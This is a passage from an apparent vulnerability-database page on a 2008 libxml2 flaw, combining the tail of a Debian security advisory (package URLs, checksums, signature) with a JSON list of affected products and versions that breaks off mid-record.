    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 1106480 03e08564e2bf843905daecdd7c5cc4c4 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 874222 ed9ab6fa068a5b07c22ec1c10db8e0ab http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 1080186 defc5f4f9eb80872a793cc025e33a111 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 48492 5a567323dc0bf8159a6eae87957266d5 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_ia64.deb Size/MD5 checksum: 196536 cdbb137c8bb31cf29114673c4cb28e67

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 34418 4a05346cb2fc6c314e7e8aef21662469 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 171678 c94bfffc6bde639623ce9a91028960e5 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 926922 ddc8ff03120dd78869830d38a5e8708d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 840642 57f2ea24a31904c4b07531f6292a4a8e http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mips.deb Size/MD5 checksum: 770246 20ba2586e1406d66bd34642f13265dcf

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 34398 9f0ebfb1dc37496e6b7a4e9963ffaeff http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 898346 29680d5d5baa66e251e71f55aa128e3c http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 768976 8f6464a0ef61b3ddcd271652a01c7469 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 833252 5c83c05d44526479e7c550fd0d8cbdbe http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_mipsel.deb Size/MD5 checksum: 168690 eb56cb1ea49795d0a5a18af468625941

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 898010 c3d61392afcb383d0f27d5f91fda721d http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 770994 94ef895f8942b880e8823e10420120e6 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 172726 5d097f0290be2bab9b93287bad07e83f http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 37660 e977bc38e837077de7a006ef923b98bd http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_powerpc.deb Size/MD5 checksum: 779958 ad7245f8a9980d7f40234aefaf12a31b

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 185726 91661276ed6cf371373b4e61805c81b8 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 885618 218f2603ab94bf92ba45cd330fe15782 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 806024 3abe21a0d756e5a0a2ca646f0ba32729 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 36378 cbc5eb7e2f81adafeba8e857aee8c918 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_s390.deb Size/MD5 checksum: 750190 4172cb95d7aea2f9ee9331220cd5274c

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dbg_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 781522 c20ea9c8ab0ec798488e68c845650036 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-dev_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 713144 e0139b86fbf9644678c2c6de6462bff1 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 759568 7d46f7ceb214711851cc1f27edef2c48 http://security.debian.org/pool/updates/main/libx/libxml2/libxml2-utils_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 34580 fceb65808b2c98f621d79352eea9d2d5 http://security.debian.org/pool/updates/main/libx/libxml2/python-libxml2_2.6.27.dfsg-5_sparc.deb Size/MD5 checksum: 176874 f27821fe07861f2e71658bc3eb0a595e

    These files will probably be moved into the stable distribution on its next update.


    For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

    iD4DBQFI9N2RwM/Gs81MDZ0RAqP7AJYxbWnJqF4zauFOietE80FTYW02AKDCOBt2 wvZ3MJ4FZeRn990jpLrh1A== =FZQi -----END PGP SIGNATURE-----

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-200809-0566",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "safari",
            "scope": "lt",
            "trust": 1.8,
            "vendor": "apple",
            "version": "4.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "model": "ubuntu linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "canonical",
            "version": "7.04"
          },
          {
            "model": "ubuntu linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "canonical",
            "version": "8.10"
          },
          {
            "model": "mac os x",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "apple",
            "version": "10.5.7"
          },
          {
            "model": "ubuntu linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "canonical",
            "version": "9.04"
          },
          {
            "model": "libxml2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "xmlsoft",
            "version": "2.7.0"
          },
          {
            "model": "safari",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apple",
            "version": "3.2.0"
          },
          {
            "model": "safari",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "apple",
            "version": "3.2.3"
          },
          {
            "model": "ubuntu linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "canonical",
            "version": "6.06"
          },
          {
            "model": "ubuntu linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "canonical",
            "version": "8.04"
          },
          {
            "model": "iphone os",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "apple",
            "version": "3.0"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "apple",
            "version": "10.5.7"
          },
          {
            "model": "ubuntu linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "canonical",
            "version": "7.10"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.6.16"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.6.14"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.6.13"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.6.11"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.6.9"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.6.6"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "xmlsoft",
            "version": "2.5.8"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "xmlsoft",
            "version": "2.7.0 before"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.4.11"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5 to  v10.5.6"
          },
          {
            "model": "mac os x",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.7"
          },
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.4.11"
          },
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5 to  v10.5.6"
          },
          {
            "model": "mac os x server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "v10.5.7"
          },
          {
            "model": "ios",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "1.0 to  2.2.1"
          },
          {
            "model": "ios for ipod touch",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "apple",
            "version": "1.1 to  2.2.1"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "10"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "oracle",
            "version": "9"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "2.1"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3 (x86)"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3 (x86-64)"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "3.0 (x86-64)"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0"
          },
          {
            "model": "asianux server",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "cybertrust",
            "version": "4.0 (x86-64)"
          },
          {
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "(sparc)"
          },
          {
            "model": "opensolaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "(x86)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (sparc)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "10 (x86)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (sparc)"
          },
          {
            "model": "solaris",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": "9 (x86)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (as)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (es)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4 (ws)"
          },
          {
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (server)"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "3.0"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "4.0"
          },
          {
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5.0 (client)"
          },
          {
            "model": "linux advanced workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "2.1"
          },
          {
            "model": "rhel desktop workstation",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "red hat",
            "version": "5 (client)"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "xmlsoft",
            "version": "2.5.7"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "xmlsoft",
            "version": "2.4.30"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "xmlsoft",
            "version": "2.6.17"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.31"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.30"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.26"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.15"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.12"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.8"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.7"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.5"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.4"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.3"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.2"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.1"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.6.0"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.5.11"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.5.10"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.5.4"
          },
          {
            "model": "libxml2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xmlsoft",
            "version": "2.5.1"
          },
          {
            "model": "freeflow print server 73.c0.41",
            "scope": null,
            "trust": 0.3,
            "vendor": "xerox",
            "version": null
          },
          {
            "model": "freeflow print server 73.b3.61",
            "scope": null,
            "trust": 0.3,
            "vendor": "xerox",
            "version": null
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.10"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "linux lts lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "8.04"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "linux lts i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10.3"
          },
          {
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "solaris 10 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 99",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 96",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 95",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 92",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 91",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 90",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 89",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 88",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 87",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 85",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 84",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 83",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 82",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 80",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 78",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 77",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 76",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 68",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 67",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 64",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 61",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 59",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 57",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 50",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 39",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 36",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 29",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 22",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 19",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 13",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 100",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 02",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "opensolaris build snv 01",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "management center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "3.6.1"
          },
          {
            "model": "management center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "4.0"
          },
          {
            "model": "management center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "3.6"
          },
          {
            "model": "java system access manager policy agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "2.2"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "11.0"
          },
          {
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "2"
          },
          {
            "model": "appliance platform linux service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "rpath",
            "version": "1"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "enterprise linux desktop workstation client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "5"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "hat enterprise linux desktop client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4"
          },
          {
            "model": "hat enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "3"
          },
          {
            "model": "hat enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5"
          },
          {
            "model": "networks self-service peri workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "networks self-service peri application",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "0"
          },
          {
            "model": "networks self-service mps",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "10000"
          },
          {
            "model": "networks self-service ccss7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-0"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.1"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2008.0"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "model": "linux mandrake",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.1"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "corporate server x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "3.0"
          },
          {
            "model": "corporate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "4.0"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
